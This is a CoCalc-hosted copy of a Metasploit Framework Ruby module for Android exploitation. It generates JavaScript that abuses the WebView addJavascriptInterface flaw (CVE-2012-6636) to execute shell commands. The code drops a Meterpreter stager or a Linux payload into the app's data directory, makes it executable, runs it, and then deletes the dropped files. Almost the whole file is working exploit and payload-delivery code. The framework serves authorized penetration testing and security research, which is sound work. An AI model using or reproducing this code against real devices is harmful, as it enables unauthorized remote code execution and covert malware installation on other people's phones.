CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/lib/msf/core/exploit/android.rb
Views: 1904
1
# -*- coding: binary -*-

2


3
module Msf

4
module Exploit::Android

5


6
  # Since the NDK stager is used, arch detection must be performed

7
  SUPPORTED_ARCHES = [ ARCH_ARMLE, ARCH_MIPSLE, ARCH_X86 ]

8


9
  # Most android devices are ARM

10
  DEFAULT_ARCH = ARCH_ARMLE

11


12
  # Some of the default NDK build targets are named differently than

13
  # msf's builtin constants. This mapping allows the ndkstager file

14
  # to be looked up from the msf constant.

15
  NDK_FILES = {

16
    ARCH_ARMLE  => 'armeabi',

17
    ARCH_MIPSLE => 'mips'

18
  }

19


20
  def add_javascript_interface_exploit_js(arch)

21
    %Q|

22
      function exec(runtime, cmdArr) {

23
        var ch = 0;

24
        var output = '';

25
        var process = runtime.exec(cmdArr);

26
        var input = process.getInputStream();

27


28
        while ((ch = input.read()) > 0) { output += String.fromCharCode(ch); }

29
        return output;

30
      }

31


32
      function attemptExploit(obj) {

33
        // ensure that the object contains a native interface

34
        try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }

35


36
        // get the pid

37
        var pid = obj.getClass()

38
                     .forName('android.os.Process')

39
                     .getMethod('myPid', null)

40
                     .invoke(null, null);

41


42
        // get the runtime so we can exec

43
        var runtime = obj.getClass()

44
                         .forName('java.lang.Runtime')

45
                         .getMethod('getRuntime', null)

46
                         .invoke(null, null);

47


48
        #{payload.arch[0] == ARCH_DALVIK ? stager_js(arch) : linux_exe_js(arch)}

49


50
        return true;

51
      }

52


53
      for (i in top) { if (attemptExploit(top[i]) === true) break; }

54
    |

55
  end

56


57
  def stager_js(arch)

58
    stagename = Rex::Text.rand_text_alpha(5)

59
    %Q|

60
      // libraryData contains the bytes for a native shared object built via NDK

61
      // which will load the "stage", which in this case is our android meterpreter stager.

62
      var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}";

63


64
      // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains

65
      // another stager which loads android meterpreter from the msf handler.

66
      var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}";

67


68
      // get the process name, which will give us our data path

69
      // $PPID does not seem to work on android 4.0, so we concat pids manually

70
      var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);

71
      var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so';

72
      var stagePath = path + '/#{stagename}.apk';

73


74
      // build the library and chmod it

75
      runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor();

76
      runtime.exec(['chmod', '700', libraryPath]).waitFor();

77


78
      // build the stage, chmod it, and load it

79
      runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor();

80
      runtime.exec(['chmod', '700', stagePath]).waitFor();

81


82
      // load the library

83
      runtime.load(libraryPath);

84


85
      // delete dropped files

86
      runtime.exec(['rm', stagePath]).waitFor();

87
      runtime.exec(['rm', libraryPath]).waitFor();

88
    |

89
  end

90


91
  def linux_exe_js(arch)

92
    platform_list = Msf::Module::PlatformList.new(Msf::Module::Platform::Linux)

93


94
    %Q|

95
      var payloadData = "#{Rex::Text.to_octal(payload.encoded_exe(arch: arch, platform: platform_list), '\\\\0')}";

96


97
      // get the process name, which will give us our data path

98
      // $PPID does not seem to work on android 4.0, so we concat pids manually

99
      var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']);

100
      var payloadPath = path + '/#{Rex::Text.rand_text_alpha(8)}';

101


102
      // build the library and chmod it

103
      runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+payloadData+'" > '+payloadPath]).waitFor();

104
      runtime.exec(['chmod', '700', payloadPath]).waitFor();

105


106
      // run the payload

107
      runtime.exec(['/system/bin/sh', '-c', payloadPath + ' &']).waitFor();

108


109
      // delete dropped files

110
      runtime.exec(['rm', payloadPath]).waitFor();

111
    |

112
  end

113


114
  # The NDK stager is used to launch a hidden APK

115
  def ndkstager(stagename, arch)

116
    stager_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2012-6636", NDK_FILES[arch] || arch, 'libndkstager.so')

117
    data = File.read(stager_file, mode: 'rb')

118
    data.gsub!('PLOAD', stagename)

119
  end

120


121
end

122
end

123


124